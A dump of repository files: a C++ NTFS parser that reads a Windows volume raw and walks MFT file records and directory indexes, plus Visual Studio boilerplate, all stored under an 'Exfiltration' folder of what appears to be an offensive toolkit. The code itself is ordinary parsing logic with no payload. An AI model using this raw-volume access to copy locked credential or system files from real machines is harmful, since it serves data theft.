ATTR_TYPE_VOLUME_NAME:\n\t\t\treturn new CAttr_VolName(ahc, this);\n\n\t\tcase ATTR_TYPE_VOLUME_INFORMATION:\n\t\t\treturn new CAttr_VolInfo(ahc, this);\n\n\t\tcase ATTR_TYPE_DATA:\n\t\t\tif (ahc->NonResident)\n\t\t\t\treturn new CAttr_Data<CAttrNonResident>(ahc, this);\n\t\t\telse\n\t\t\t\treturn new CAttr_Data<CAttrResident>(ahc, this);\n\n\t\tcase ATTR_TYPE_INDEX_ROOT:\n\t\t\treturn new CAttr_IndexRoot(ahc, this);\n\n\t\tcase ATTR_TYPE_INDEX_ALLOCATION:\n\t\t\treturn new CAttr_IndexAlloc(ahc, this);\n\n\t\tcase ATTR_TYPE_BITMAP:\n\t\t\tif (ahc->NonResident)\n\t\t\t\treturn new CAttr_Bitmap<CAttrNonResident>(ahc, this);\n\t\t\telse\n\t\t\t\t// Resident Bitmap may exist in a directory's FileRecord\n\t\t\t\t// or in $MFT for a very small volume in theory\n\t\t\t\treturn new CAttr_Bitmap<CAttrResident>(ahc, this);\n\n\t\t// Unhandled Attributes\n\t\tdefault:\n\t\t\t*bUnhandled = TRUE;\n\t\t\tif (ahc->NonResident)\n\t\t\t\treturn new CAttrNonResident(ahc, this);\n\t\t\telse\n\t\t\t\treturn new CAttrResident(ahc, this);\n\t}\n}\n\n// Parse a single Attribute\n// Return False on error\nBOOL CFileRecord::ParseAttr(ATTR_HEADER_COMMON *ahc)\n{\n\tDWORD attrIndex = ATTR_INDEX(ahc->Type);\n\tif (attrIndex < ATTR_NUMS)\n\t{\n\t\tBOOL bDiscard = FALSE;\n\t\tUserCallBack(attrIndex, ahc, &bDiscard);\n\n\t\tif (!bDiscard)\n\t\t{\n\t\t\tBOOL bUnhandled = FALSE;\n\t\t\tCAttrBase *attr = AllocAttr(ahc, &bUnhandled);\n\t\t\tif (attr)\n\t\t\t{\n\t\t\t\tif (bUnhandled)\n\t\t\t\t{\n\t\t\t\t\tNTFS_TRACE1(\"Unhandled attribute: 0x%04X\\n\", ahc->Type);\n\t\t\t\t}\n\t\t\t\tAttrList[attrIndex].InsertEntry(attr);\n\t\t\t\treturn TRUE;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tNTFS_TRACE1(\"Attribute Parse error: 0x%04X\\n\", ahc->Type);\n\t\t\t\treturn FALSE;\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tNTFS_TRACE1(\"User Callback has processed this Attribute: 0x%04X\\n\", ahc->Type);\n\t\t\treturn TRUE;\n\t\t}\n\t}\n\telse\n\t{\n\t\tNTFS_TRACE1(\"Invalid Attribute Type: 0x%04X\\n\", ahc->Type);\n\t\treturn FALSE;\n\t}\n}\n\n// Read File Record\nFILE_RECORD_HEADER* CFileRecord::ReadFileRecord(ULONGLONG &fileRef)\n{\n\tFILE_RECORD_HEADER *fr = NULL;\n\tDWORD len;\n\n\tif (fileRef < MFT_IDX_USER || Volume->MFTData == NULL)\n\t{\n\t\t// Take as continuous disk allocation\n\t\tLARGE_INTEGER frAddr;\n\t\tfrAddr.QuadPart = Volume->MFTAddr + (Volume->FileRecordSize) * fileRef;\n\t\tfrAddr.LowPart = SetFilePointer(Volume->hVolume, frAddr.LowPart, &frAddr.HighPart, FILE_BEGIN);\n\n\t\tif (frAddr.LowPart == DWORD(-1) && GetLastError() != NO_ERROR)\n\t\t\treturn FALSE;\n\t\telse\n\t\t{\n\t\t\tfr = (FILE_RECORD_HEADER*)new BYTE[Volume->FileRecordSize];\n\n\t\t\tif (ReadFile(Volume->hVolume, fr, Volume->FileRecordSize, &len, NULL)\n\t\t\t\t&& len==Volume->FileRecordSize)\n\t\t\t\treturn fr;\n\t\t\telse\n\t\t\t{\n\t\t\t\tdelete fr;\n\t\t\t\treturn NULL;\n\t\t\t}\n\t\t}\n\t}\n\telse\n\t{\n\t\t// May be fragmented $MFT\n\t\tULONGLONG frAddr;\n\t\tfrAddr = (Volume->FileRecordSize) * fileRef;\n\n\t\tfr = (FILE_RECORD_HEADER*)new BYTE[Volume->FileRecordSize];\n\n\t\tif (Volume->MFTData->ReadData(frAddr, fr, Volume->FileRecordSize, &len)\n\t\t\t&& len == Volume->FileRecordSize)\n\t\t\treturn fr;\n\t\telse\n\t\t{\n\t\t\tdelete fr;\n\t\t\treturn NULL;\n\t\t}\n\t}\n}\n\n// Read File Record, verify and patch the US (update sequence)\nBOOL CFileRecord::ParseFileRecord(ULONGLONG fileRef)\n{\n\t// Clear previous data\n\tClearAttrs();\n\tif (FileRecord)\n\t{\n\t\tdelete FileRecord;\n\t\tFileRecord = NULL;\n\t}\n\n\tFILE_RECORD_HEADER *fr = ReadFileRecord(fileRef);\n\tif (fr == NULL)\n\t{\n\t\tNTFS_TRACE1(\"Cannot read file record %I64u\\n\", fileRef);\n\n\t\tFileReference = (ULONGLONG)-1;\n\t}\n\telse\n\t{\n\t\tFileReference = fileRef;\n\n\t\tif (fr->Magic == FILE_RECORD_MAGIC)\n\t\t{\n\t\t\t// Patch US\n\t\t\tWORD *usnaddr = (WORD*)((BYTE*)fr + fr->OffsetOfUS);\n\t\t\tWORD usn = *usnaddr;\n\t\t\tWORD *usarray = usnaddr + 1;\n\t\t\tif (PatchUS((WORD*)fr, Volume->FileRecordSize/Volume->SectorSize, usn, usarray))\n\t\t\t{\n\t\t\t\tNTFS_TRACE1(\"File Record %I64u Found\\n\", fileRef);\n\t\t\t\tFileRecord = fr;\n\n\t\t\t\treturn TRUE;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tNTFS_TRACE(\"Update Sequence Number error\\n\");\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tNTFS_TRACE(\"Invalid file record\\n\");\n\t\t}\n\n\t\tdelete fr;\n\t}\n\n\treturn FALSE;\n}\n\n// Visit IndexBlocks recursivly to find a specific FileName\nBOOL CFileRecord::VisitIndexBlock(const ULONGLONG &vcn, const _TCHAR *fileName, CIndexEntry &ieFound) const\n{\n\tCAttr_IndexAlloc *ia = (CAttr_IndexAlloc*)FindFirstAttr(ATTR_TYPE_INDEX_ALLOCATION);\n\tif (ia == NULL)\n\t\treturn FALSE;\n\n\tCIndexBlock ib;\n\tif (ia->ParseIndexBlock(vcn, ib))\n\t{\n\t\tCIndexEntry *ie = ib.FindFirstEntry();\n\t\twhile (ie)\n\t\t{\n\t\t\tif (ie->HasName())\n\t\t\t{\n\t\t\t\t// Compare name\n\t\t\t\tint i = ie->Compare(fileName);\n\t\t\t\tif (i == 0)\n\t\t\t\t{\n\t\t\t\t\tieFound = *ie;\n\t\t\t\t\treturn TRUE;\n\t\t\t\t}\n\t\t\t\telse if (i < 0)\t\t// fileName is smaller than IndexEntry\n\t\t\t\t{\n\t\t\t\t\t// Visit SubNode\n\t\t\t\t\tif (ie->IsSubNodePtr())\n\t\t\t\t\t{\n\t\t\t\t\t\t// Search in SubNode (IndexBlock), recursive call\n\t\t\t\t\t\tif (VisitIndexBlock(ie->GetSubNodeVCN(), fileName, ieFound))\n\t\t\t\t\t\t\treturn TRUE;\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t\treturn FALSE;\t// not found\n\t\t\t\t}\n\t\t\t\t// Just step forward if fileName is bigger than IndexEntry\n\t\t\t}\n\t\t\telse if (ie->IsSubNodePtr())\n\t\t\t{\n\t\t\t\t// Search in SubNode (IndexBlock), recursive call\n\t\t\t\tif (VisitIndexBlock(ie->GetSubNodeVCN(), fileName, ieFound))\n\t\t\t\t\treturn TRUE;\n\t\t\t}\n\n\t\t\tie = ib.FindNextEntry();\n\t\t}\n\t}\n\n\treturn FALSE;\n}\n\n// Traverse SubNode recursivly in ascending order\n// Call user defined callback routine once found an subentry\nvoid CFileRecord::TraverseSubNode(const ULONGLONG &vcn, SUBENTRY_CALLBACK seCallBack) const\n{\n\tCAttr_IndexAlloc *ia = (CAttr_IndexAlloc*)FindFirstAttr(ATTR_TYPE_INDEX_ALLOCATION);\n\tif (ia == NULL)\n\t\treturn;\n\n\tCIndexBlock ib;\n\tif (ia->ParseIndexBlock(vcn, ib))\n\t{\n\t\tCIndexEntry *ie = ib.FindFirstEntry();\n\t\twhile (ie)\n\t\t{\n\t\t\tif (ie->IsSubNodePtr())\n\t\t\t\tTraverseSubNode(ie->GetSubNodeVCN(), seCallBack);\t// recursive call\n\n\t\t\tif (ie->HasName())\n\t\t\t\tseCallBack(ie);\n\n\t\t\tie = ib.FindNextEntry();\n\t\t}\n\t}\n}\n\n// Parse all the attributes in a File Record\n// And insert them into a link list\nBOOL CFileRecord::ParseAttrs()\n{\n\t_ASSERT(FileRecord);\n\n\t// Clear previous data\n\tClearAttrs();\n\n\t// Visit all attributes\n\n\tDWORD dataPtr = 0;\t// guard if data exceeds FileRecordSize bounds\n\tATTR_HEADER_COMMON *ahc = (ATTR_HEADER_COMMON*)((BYTE*)FileRecord + FileRecord->OffsetOfAttr);\n\tdataPtr += FileRecord->OffsetOfAttr;\n\n\twhile (ahc->Type != (DWORD)-1 && (dataPtr+ahc->TotalSize) <= Volume->FileRecordSize)\n\t{\n\t\tif (ATTR_MASK(ahc->Type) & AttrMask)\t// Skip unwanted attributes\n\t\t{\n\t\t\tif (!ParseAttr(ahc))\t// Parse error\n\t\t\t\treturn FALSE;\n\n\t\t\tif (IsEncrypted() || IsCompressed())\n\t\t\t{\n\t\t\t\tNTFS_TRACE(\"Compressed and Encrypted file not supported yet !\\n\");\n\t\t\t\treturn FALSE;\n\t\t\t}\n\t\t}\n\n\t\tdataPtr += ahc->TotalSize;\n\t\tahc = (ATTR_HEADER_COMMON*)((BYTE*)ahc + ahc->TotalSize);\t// next attribute\n\t}\n\n\treturn TRUE;\n}\n\n// Install Attribute raw data CallBack routines for a single File Record\nBOOL CFileRecord::InstallAttrRawCB(DWORD attrType, ATTR_RAW_CALLBACK cb)\n{\n\tDWORD atIdx = ATTR_INDEX(attrType);\n\tif (atIdx < ATTR_NUMS)\n\t{\n\t\tAttrRawCallBack[atIdx] = cb;\n\t\treturn TRUE;\n\t}\n\telse\n\t\treturn FALSE;\n}\n\n// Clear all Attribute CallBack routines\n__inline void CFileRecord::ClearAttrRawCB()\n{\n\tfor (int i = 0; i < ATTR_NUMS; i ++)\n\t\tAttrRawCallBack[i] = NULL;\n}\n\n// Choose attributes to handle, unwanted attributes will be discarded silently\n__inline void CFileRecord::SetAttrMask(DWORD mask)\n{\n\t// Standard Information and Attribute List is needed always\n\tAttrMask = mask | MASK_STANDARD_INFORMATION | MASK_ATTRIBUTE_LIST;\n}\n\n// Traverse all Attribute and return CAttr_xxx classes to User Callback routine\nvoid CFileRecord::TraverseAttrs(ATTRS_CALLBACK attrCallBack, void *context)\n{\n\t_ASSERT(attrCallBack);\n\n\tfor (int i = 0; i < ATTR_NUMS; i ++)\n\t{\n\t\tif (AttrMask & (((DWORD)1)<<i))\t// skip masked attributes\n\t\t{\n\t\t\tconst CAttrBase *ab = AttrList[i].FindFirstEntry();\n\t\t\twhile (ab)\n\t\t\t{\n\t\t\t\tBOOL bStop;\n\t\t\t\tbStop = FALSE;\n\t\t\t\tattrCallBack(ab, context, &bStop);\n\t\t\t\tif (bStop)\n\t\t\t\t\treturn;\n\n\t\t\t\tab = AttrList[i].FindNextEntry();\n\t\t\t}\n\t\t}\n\t}\n}\n\n// Find Attributes\n__inline const CAttrBase* CFileRecord::FindFirstAttr(DWORD attrType) const\n{\n\tDWORD attrIdx = ATTR_INDEX(attrType);\n\n\treturn attrIdx < ATTR_NUMS ? AttrList[attrIdx].FindFirstEntry() : NULL;\n}\n\nconst CAttrBase* CFileRecord::FindNextAttr(DWORD attrType) const\n{\n\tDWORD attrIdx = ATTR_INDEX(attrType);\n\n\treturn attrIdx < ATTR_NUMS ? AttrList[attrIdx].FindNextEntry() : NULL;\n}\n\n// Get File Name (First Win32 name)\nint CFileRecord::GetFileName(_TCHAR *buf, DWORD bufLen) const\n{\n\t// A file may have several filenames\n\t// Return the first Win32 filename\n\tCAttr_FileName *fn = (CAttr_FileName*)AttrList[ATTR_INDEX(ATTR_TYPE_FILE_NAME)].FindFirstEntry();\n\twhile (fn)\n\t{\n\t\tif (fn->IsWin32Name())\n\t\t{\n\t\t\tint len = fn->GetFileName(buf, bufLen);\n\t\t\tif (len != 0)\n\t\t\t\treturn len;\t// success or fail\n\t\t}\n\n\t\tfn = (CAttr_FileName*)AttrList[ATTR_INDEX(ATTR_TYPE_FILE_NAME)].FindNextEntry();\n\t}\n\n\treturn 0;\n}\n\n// Get File Size\n__inline ULONGLONG CFileRecord::GetFileSize() const\n{\n\tCAttr_FileName *fn = (CAttr_FileName*)AttrList[ATTR_INDEX(ATTR_TYPE_FILE_NAME)].FindFirstEntry();\n\treturn fn ? fn->GetFileSize() : 0;\n}\n\n// Get File Times\nvoid CFileRecord::GetFileTime(FILETIME *writeTm, FILETIME *createTm, FILETIME *accessTm) const\n{\n\t// Standard Information attribute hold the most updated file time\n\tCAttr_StdInfo *si = (CAttr_StdInfo*)AttrList[ATTR_INDEX(ATTR_TYPE_STANDARD_INFORMATION)].FindFirstEntry();\n\tif (si)\n\t\tsi->GetFileTime(writeTm, createTm, accessTm);\n\telse\n\t{\n\t\twriteTm->dwHighDateTime = 0;\n\t\twriteTm->dwLowDateTime = 0;\n\t\tif (createTm)\n\t\t{\n\t\t\tcreateTm->dwHighDateTime = 0;\n\t\t\tcreateTm->dwLowDateTime = 0;\n\t\t}\n\t\tif (accessTm)\n\t\t{\n\t\t\taccessTm->dwHighDateTime = 0;\n\t\t\taccessTm->dwLowDateTime = 0;\n\t\t}\n\t}\n}\n\n// Traverse all sub directories and files contained\n// Call user defined callback routine once found an entry\nvoid CFileRecord::TraverseSubEntries(SUBENTRY_CALLBACK seCallBack) const\n{\n\t_ASSERT(seCallBack);\n\n\t// Start traversing from IndexRoot (B+ tree root node)\n\n\tCAttr_IndexRoot* ir = (CAttr_IndexRoot*)FindFirstAttr(ATTR_TYPE_INDEX_ROOT);\n\tif (ir == NULL || !ir->IsFileName())\n\t\treturn;\n\n\tCIndexEntryList *ieList = (CIndexEntryList*)ir;\n\tCIndexEntry *ie = ieList->FindFirstEntry();\n\twhile (ie)\n\t{\n\t\t// Visit subnode first\n\t\tif (ie->IsSubNodePtr())\n\t\t\tTraverseSubNode(ie->GetSubNodeVCN(), seCallBack);\n\n\t\tif (ie->HasName())\n\t\t\tseCallBack(ie);\n\n\t\tie = ieList->FindNextEntry();\n\t}\n}\n\n// Find a specific FileName from InexRoot described B+ tree\n__inline const BOOL CFileRecord::FindSubEntry(const _TCHAR *fileName, CIndexEntry &ieFound) const\n{\n\t// Start searching from IndexRoot (B+ tree root node)\n\tCAttr_IndexRoot *ir = (CAttr_IndexRoot*)FindFirstAttr(ATTR_TYPE_INDEX_ROOT);\n\tif (ir == NULL || !ir->IsFileName())\n\t\treturn FALSE;\n\n\tCIndexEntryList *ieList = (CIndexEntryList*)ir;\n\tCIndexEntry *ie = ieList->FindFirstEntry();\n\twhile (ie)\n\t{\n\t\tif (ie->HasName())\n\t\t{\n\t\t\t// Compare name\n\t\t\tint i = ie->Compare(fileName);\n\t\t\tif (i == 0)\n\t\t\t{\n\t\t\t\tieFound = *ie;\n\t\t\t\treturn TRUE;\n\t\t\t}\n\t\t\telse if (i < 0)\t\t// fileName is smaller than IndexEntry\n\t\t\t{\n\t\t\t\t// Visit SubNode\n\t\t\t\tif (ie->IsSubNodePtr())\n\t\t\t\t{\n\t\t\t\t\t// Search in SubNode (IndexBlock)\n\t\t\t\t\tif (VisitIndexBlock(ie->GetSubNodeVCN(), fileName, ieFound))\n\t\t\t\t\t\treturn TRUE;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t\treturn FALSE;\t// not found\n\t\t\t}\n\t\t\t// Just step forward if fileName is bigger than IndexEntry\n\t\t}\n\t\telse if (ie->IsSubNodePtr())\n\t\t{\n\t\t\t// Search in SubNode (IndexBlock)\n\t\t\tif (VisitIndexBlock(ie->GetSubNodeVCN(), fileName, ieFound))\n\t\t\t\treturn TRUE;\n\t\t}\n\n\t\tie = ieList->FindNextEntry();\n\t}\n\n\treturn FALSE;\n}\n\n// Find Data attribute class of \nconst CAttrBase* CFileRecord::FindStream(_TCHAR *name)\n{\n\tconst CAttrBase *data = FindFirstAttr(ATTR_TYPE_DATA);\n\twhile (data)\n\t{\n\t\tif (data->IsUnNamed() && name == NULL)\t// Unnamed stream\n\t\t\tbreak;\n\t\tif ((!data->IsUnNamed()) && name)\t// Named stream\n\t\t{\n\t\t\t_TCHAR an[MAX_PATH];\n\t\t\tif (data->GetAttrName(an, MAX_PATH))\n\t\t\t{\n\t\t\t\tif (_tcscmp(an, name) == 0)\n\t\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\n\t\tdata = FindNextAttr(ATTR_TYPE_DATA);\n\t}\n\n\treturn data;\n}\n\n// Check if it's deleted or in use\n__inline BOOL CFileRecord::IsDeleted() const\n{\n\treturn !(FileRecord->Flags & FILE_RECORD_FLAG_INUSE);\n}\n\n// Check if it's a directory\n__inline BOOL CFileRecord::IsDirectory() const\n{\n\treturn FileRecord->Flags & FILE_RECORD_FLAG_DIR;\n}\n\n__inline BOOL CFileRecord::IsReadOnly() const\n{\n\t// Standard Information attribute holds the most updated file time\n\tconst CAttr_StdInfo *si = (CAttr_StdInfo*)AttrList[ATTR_INDEX(ATTR_TYPE_STANDARD_INFORMATION)].FindFirstEntry();\n\treturn si ? si->IsReadOnly() : FALSE;\n}\n\n__inline BOOL CFileRecord::IsHidden() const\n{\n\tconst CAttr_StdInfo *si = (CAttr_StdInfo*)AttrList[ATTR_INDEX(ATTR_TYPE_STANDARD_INFORMATION)].FindFirstEntry();\n\treturn si ? si->IsHidden() : FALSE;\n}\n\n__inline BOOL CFileRecord::IsSystem() const\n{\n\tconst CAttr_StdInfo *si = (CAttr_StdInfo*)AttrList[ATTR_INDEX(ATTR_TYPE_STANDARD_INFORMATION)].FindFirstEntry();\n\treturn si ? si->IsSystem() : FALSE;\n}\n\n__inline BOOL CFileRecord::IsCompressed() const\n{\n\tconst CAttr_StdInfo *si = (CAttr_StdInfo*)AttrList[ATTR_INDEX(ATTR_TYPE_STANDARD_INFORMATION)].FindFirstEntry();\n\treturn si ? si->IsCompressed() : FALSE;\n}\n\n__inline BOOL CFileRecord::IsEncrypted() const\n{\n\tconst CAttr_StdInfo *si = (CAttr_StdInfo*)AttrList[ATTR_INDEX(ATTR_TYPE_STANDARD_INFORMATION)].FindFirstEntry();\n\treturn si ? si->IsEncrypted() : FALSE;\n}\n\n__inline BOOL CFileRecord::IsSparse() const\n{\n\tconst CAttr_StdInfo *si = (CAttr_StdInfo*)AttrList[ATTR_INDEX(ATTR_TYPE_STANDARD_INFORMATION)].FindFirstEntry();\n\treturn si ? si->IsSparse() : FALSE;\n}\n\n\n///////////////////////////////////////\n// NTFS Volume Implementation\n///////////////////////////////////////\nCNTFSVolume::CNTFSVolume(_TCHAR volume)\n{\n\thVolume = INVALID_HANDLE_VALUE;\n\tVolumeOK = FALSE;\n\tMFTRecord = NULL;\n\tMFTData = NULL;\n\tVersion = 0;\n\tClearAttrRawCB();\n\n\tif (!OpenVolume(volume))\n\t\treturn;\n\n\t// Verify NTFS volume version (must >= 3.0)\n\n\tCFileRecord vol(this);\n\tvol.SetAttrMask(MASK_VOLUME_NAME | MASK_VOLUME_INFORMATION);\n\tif (!vol.ParseFileRecord(MFT_IDX_VOLUME))\n\t\treturn;\n\n\tvol.ParseAttrs();\n\tCAttr_VolInfo *vi = (CAttr_VolInfo*)vol.FindFirstAttr(ATTR_TYPE_VOLUME_INFORMATION);\n\tif (!vi)\n\t\treturn;\n\n\tVersion = vi->GetVersion();\n\tNTFS_TRACE2(\"NTFS volume version: %u.%u\\n\", HIBYTE(Version), LOBYTE(Version));\n\tif (Version < 0x0300)\t// NT4 ?\n\t\treturn;\n\n#ifdef\t_DEBUG\n\tCAttr_VolName *vn = (CAttr_VolName*)vol.FindFirstAttr(ATTR_TYPE_VOLUME_NAME);\n\tif (vn)\n\t{\n\t\tchar volname[MAX_PATH];\n\t\tif (vn->GetName(volname, MAX_PATH) > 0)\n\t\t{\n\t\t\tNTFS_TRACE1(\"NTFS volume name: %s\\n\", volname);\n\t\t}\n\t}\n#endif\n\n\tVolumeOK = TRUE;\n\n\tMFTRecord = new CFileRecord(this);\n\tMFTRecord->SetAttrMask(MASK_DATA);\n\tif (MFTRecord->ParseFileRecord(MFT_IDX_MFT))\n\t{\n\t\tMFTRecord->ParseAttrs();\n\t\tMFTData = MFTRecord->FindFirstAttr(ATTR_TYPE_DATA);\n\t\tif (MFTData == NULL)\n\t\t{\n\t\t\tdelete MFTRecord;\n\t\t\tMFTRecord = NULL;\n\t\t}\n\t}\n}\n\nCNTFSVolume::~CNTFSVolume()\n{\n\tif (hVolume != INVALID_HANDLE_VALUE)\n\t\tCloseHandle(hVolume);\n\n\tif (MFTRecord)\n\t\tdelete MFTRecord;\n}\n\n// Open a volume ('a' - 'z', 'A' - 'Z'), get volume handle and BPB\nBOOL CNTFSVolume::OpenVolume(_TCHAR volume)\n{\n\t// Verify parameter\n\tif (!_istalpha(volume))\n\t{\n\t\tNTFS_TRACE(\"Volume name error, should be like 'C', 'D'\\n\");\n\t\treturn FALSE;\n\t}\n\n\t_TCHAR volumePath[7];\n\t_sntprintf(volumePath, 6, _T(\"\\\\\\\\.\\\\%c:\"), volume);\n\tvolumePath[6] = _T('\\0');\n\n\thVolume = CreateFile(volumePath, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,\n\t\tNULL, OPEN_EXISTING, FILE_ATTRIBUTE_READONLY, NULL);\n\tif (hVolume != INVALID_HANDLE_VALUE)\n\t{\n\t\tDWORD num;\n\t\tNTFS_BPB bpb;\n\n\t\t// Read the first sector (boot sector)\n\t\tif (ReadFile(hVolume, &bpb, 512, &num, NULL) && num==512)\n\t\t{\n\t\t\tif (strncmp((const char*)bpb.Signature, NTFS_SIGNATURE, 8) == 0)\n\t\t\t{\n\t\t\t\t// Log important volume parameters\n\n\t\t\t\tSectorSize = bpb.BytesPerSector;\n\t\t\t\tNTFS_TRACE1(\"Sector Size = %u bytes\\n\", SectorSize);\n\n\t\t\t\tClusterSize = SectorSize * bpb.SectorsPerCluster;\n\t\t\t\tNTFS_TRACE1(\"Cluster Size = %u bytes\\n\", ClusterSize);\n\n\t\t\t\tint sz = (char)bpb.ClustersPerFileRecord;\n\t\t\t\tif (sz > 0)\n\t\t\t\t\tFileRecordSize = ClusterSize * sz;\n\t\t\t\telse\n\t\t\t\t\tFileRecordSize = 1 << (-sz);\n\t\t\t\tNTFS_TRACE1(\"FileRecord Size = %u bytes\\n\", FileRecordSize);\n\n\t\t\t\tsz = (char)bpb.ClustersPerIndexBlock;\n\t\t\t\tif (sz > 0)\n\t\t\t\t\tIndexBlockSize = ClusterSize * sz;\n\t\t\t\telse\n\t\t\t\t\tIndexBlockSize = 1 << (-sz);\n\t\t\t\tNTFS_TRACE1(\"IndexBlock Size = %u bytes\\n\", IndexBlockSize);\n\n\t\t\t\tMFTAddr = bpb.LCN_MFT * ClusterSize;\n\t\t\t\tNTFS_TRACE1(\"MFT address = 0x%016I64X\\n\", MFTAddr);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tNTFS_TRACE(\"Volume file system is not NTFS\\n\");\n\t\t\t\tgoto IOError;\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tNTFS_TRACE(\"Read boot sector error\\n\");\n\t\t\tgoto IOError;\n\t\t}\n\t}\n\telse\n\t{\n\t\tNTFS_TRACE1(\"Cannnot open volume %c\\n\", (char)volume);\nIOError:\n\t\tif (hVolume != INVALID_HANDLE_VALUE)\n\t\t{\n\t\t\tCloseHandle(hVolume);\n\t\t\thVolume = INVALID_HANDLE_VALUE;\n\t\t}\n\t\treturn FALSE;\n\t}\n\n\treturn TRUE;\n}\n\n// Check if Volume is successfully opened\n__inline BOOL CNTFSVolume::IsVolumeOK() const\n{\n\treturn VolumeOK;\n}\n\n// Get NTFS volume version\n__inline WORD CNTFSVolume::GetVersion() const\n{\n\treturn Version;\n}\n\n// Get File Record count\n__inline ULONGLONG CNTFSVolume::GetRecordsCount() const\n{\n\treturn (MFTData->GetDataSize() / FileRecordSize);\n}\n\n// Get BPB information\n\n__inline DWORD CNTFSVolume::GetSectorSize() const\n{\n\treturn SectorSize;\n}\n\n__inline DWORD CNTFSVolume::GetClusterSize() const\n{\n\treturn ClusterSize;\n}\n\n__inline DWORD CNTFSVolume::GetFileRecordSize() const\n{\n\treturn FileRecordSize;\n}\n\n__inline DWORD CNTFSVolume::GetIndexBlockSize() const\n{\n\treturn IndexBlockSize;\n}\n\n// Get MFT starting address\n__inline ULONGLONG CNTFSVolume::GetMFTAddr() const\n{\n\treturn MFTAddr;\n}\n\n// Install Attribute CallBack routines for the whole Volume\nBOOL CNTFSVolume::InstallAttrRawCB(DWORD attrType, ATTR_RAW_CALLBACK cb)\n{\n\tDWORD atIdx = ATTR_INDEX(attrType);\n\tif (atIdx < ATTR_NUMS)\n\t{\n\t\tAttrRawCallBack[atIdx] = cb;\n\t\treturn TRUE;\n\t}\n\telse\n\t\treturn FALSE;\n}\n\n// Clear all Attribute CallBack routines\n__inline void CNTFSVolume::ClearAttrRawCB()\n{\n\tfor (int i = 0; i < ATTR_NUMS; i ++)\n\t\tAttrRawCallBack[i] = NULL;\n}\n\n#endif\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParserDLL/ReadMe.txt",
    "content": "========================================================================\n    DYNAMIC LINK LIBRARY : NTFSParserDLL Project Overview\n========================================================================\n\nAppWizard has created this NTFSParserDLL DLL for you.\n\nThis file contains a summary of what you will find in each of the files that\nmake up your NTFSParserDLL application.\n\n\nNTFSParserDLL.vcxproj\n    This is the main project file for VC++ projects generated using an Application Wizard.\n    It contains information about the version of Visual C++ that generated the file, and\n    information about the platforms, configurations, and project features selected with the\n    Application Wizard.\n\nNTFSParserDLL.vcxproj.filters\n    This is the filters file for VC++ projects generated using an Application Wizard. \n    It contains information about the association between the files in your project \n    and the filters. This association is used in the IDE to show grouping of files with\n    similar extensions under a specific node (for e.g. \".cpp\" files are associated with the\n    \"Source Files\" filter).\n\nNTFSParserDLL.cpp\n    This is the main DLL source file.\n\n\tWhen created, this DLL does not export any symbols. As a result, it\n\twill not produce a .lib file when it is built. If you wish this project\n\tto be a project dependency of some other project, you will either need to\n\tadd code to export some symbols from the DLL so that an export library\n\twill be produced, or you can set the Ignore Input Library property to Yes\n\ton the General propert page of the Linker folder in the project's Property\n\tPages dialog box.\n\n/////////////////////////////////////////////////////////////////////////////\nOther standard files:\n\nStdAfx.h, StdAfx.cpp\n    These files are used to build a precompiled header (PCH) file\n    named NTFSParserDLL.pch and a precompiled types file named StdAfx.obj.\n\n/////////////////////////////////////////////////////////////////////////////\nOther notes:\n\nAppWizard uses \"TODO:\" comments to indicate parts of the source code you\nshould add to or customize.\n\n/////////////////////////////////////////////////////////////////////////////\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParserDLL/dllmain.cpp",
    "content": "/*\n * \n * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek\n *\n * This program/include file is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License as published\n * by the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program/include file is distributed in the hope that it will be\n * useful, but WITHOUT ANY WARRANTY; without even the implied warranty\n * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n */\n//\n// This code uses libraries released under GPLv2(or later) written by cyb70289 <cyb70289@gmail.com>\n\n// dllmain.cpp : Defines the entry point for the DLL application.\n#include \"stdafx.h\"\n\nBOOL APIENTRY DllMain( HMODULE hModule,\n                       DWORD  ul_reason_for_call,\n                       LPVOID lpReserved\n\t\t\t\t\t )\n{\n\tswitch (ul_reason_for_call)\n\t{\n\tcase DLL_PROCESS_ATTACH:\n\tcase DLL_THREAD_ATTACH:\n\tcase DLL_THREAD_DETACH:\n\tcase DLL_PROCESS_DETACH:\n\t\tbreak;\n\t}\n\treturn TRUE;\n}\n\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParserDLL/stdafx.cpp",
    "content": "// stdafx.cpp : source file that includes just the standard includes\n// NTFSParserDLL.pch will be the pre-compiled header\n// stdafx.obj will contain the pre-compiled type information\n\n#include \"stdafx.h\"\n\n// TODO: reference any additional headers you need in STDAFX.H\n// and not in this file\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParserDLL/stdafx.h",
    "content": "// stdafx.h : include file for standard system include files,\n// or project specific include files that are used frequently, but\n// are changed infrequently\n//\n\n#pragma once\n\n#include \"targetver.h\"\n\n#define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers\n// Windows Header Files:\n#include <windows.h>\n#include <string>\n#include <iostream>\n\n\n\n// TODO: reference additional headers your program requires here\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParserDLL/targetver.h",
    "content": "#pragma once\n\n// Including SDKDDKVer.h defines the highest available Windows platform.\n\n// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and\n// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.\n\n#include <SDKDDKVer.h>\n"
  },
  {
    "path": "Exfiltration/Out-Minidump.ps1",
